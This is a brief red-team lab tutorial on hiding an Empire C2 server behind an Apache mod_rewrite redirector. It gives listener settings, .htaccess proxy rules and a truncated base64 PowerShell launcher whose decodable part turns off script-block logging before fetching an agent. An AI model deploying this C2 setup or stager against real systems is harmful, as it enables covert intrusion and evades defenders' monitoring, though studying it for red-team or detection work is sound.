Empire Redirector

kth's lab

2018-07-28

C&C, Red Team

Empire Redirector with Apache_mod

Redirector

when we pentest , once we breached to network , we need back connect to our machine.
c2 comes in but .. silently
if traffice of c2 seems suspicious , it is easy to find out.
many more reasons to hide C2 Server
several techniques to redirect your C2
- socat
- iptables
- apache mod_rewrite
choose wisely , now demo with apache mod_rewrite
Setup Empire Listeners

(Empire: listeners) > info New

New Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        New                              Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  Host              True        http://192.168.1.155:80          Hostname/IP for staging.
  Port              True        8080                             Port for the listener.
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  BindIP            True        192.168.1.227                    The IP to bind to on the control server.
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        b5195f448ed29a96415ae7a8babfa2d7 Staging key for initial agent negotiation.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  Proxy             False       default                          Proxy to use for request (default, none, or other).

Host value is for redirect machine IP
Port is for payload listening machine which means Empire machine
BindIP is same with payload machine
can Setup Default Profile in order to avoid some detection , I use default for testing

Setup Redirector Apache machine

Setup apache mode redirector

root@kali:/var/www/html# a2enmod rewrite proxy proxy_http
Enabling module reqwrite.
Enabling module proxy.
Considering dependency proxy for proxy_http:
Enabling module proxy_http.
To activate the new configuration, you need to run:
    systemctl restart apache2

set up .htaccess

RewriteEngine On
RewriteCond %{REQUEST_URI} ^/(admin/get.php|login/process.php|new.php)/?$ 
RewriteRule ^.*$ http://192.168.1.227:8080/%{REQUEST_URI} [P]
RewriteRule ^.*$ http://google.com/? [L,R=302]

start web server

create launcher from empire

1
2

(Empire: listeners) > launcher powwershell New
powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBlAHIAUwBpAG8AbgBUAEEAYgBsAEUALgBQAFMAVgBlAFIAUwBpAE8ATgAuAE0AYQBqAE8AUgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAcgBFAEYAXQAuAEEAcwBzAEUATQBiAEwAWQAuAEcARQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkAZQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEATAB1AGUAKAAkAE4AdQBsAEwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBMAD0AWwBDAG8AbABMAGUAYwB0AEkAbwBuAHMALgBHAGUATgBlAFIASQBjAC4ARABpAGMAVABJAE8AbgBBAFIAeQBbAHMAVABSAGkAbgBHACwAUwBZAFMAdABlAG0ALgBPAEIAagBFAEMAdABdAF0AOgA6AG4AZQBXACgAKQA7ACQAdgBBAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUATABTAGUAewBbAFMAYwByAEkAUABUAEIAbABvAEMAawBdAC4AIgBHAGUAVABGAGkARQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBhAGwAVQBFACgAJABuAFUATABsACwAKABOAGUAVwAtAE8AQgBqAGUAQwBUACAAQwBvAEwAbABlAGMAVABpAG8AbgBTAC4ARwBlAE4AZQBSAGkAYwAuAEgAQQBTAEgAUwBFAHQAWwBzAHQAcgBpAG4ARwBdACkAKQB9AFsAUgBlAEYAXQAuAEEAUwBzAGUATQBCAGwAWQAuAEcAZQB0AFQAWQBwAEUA...

run it in windows
it goes to web server and redirect to Empire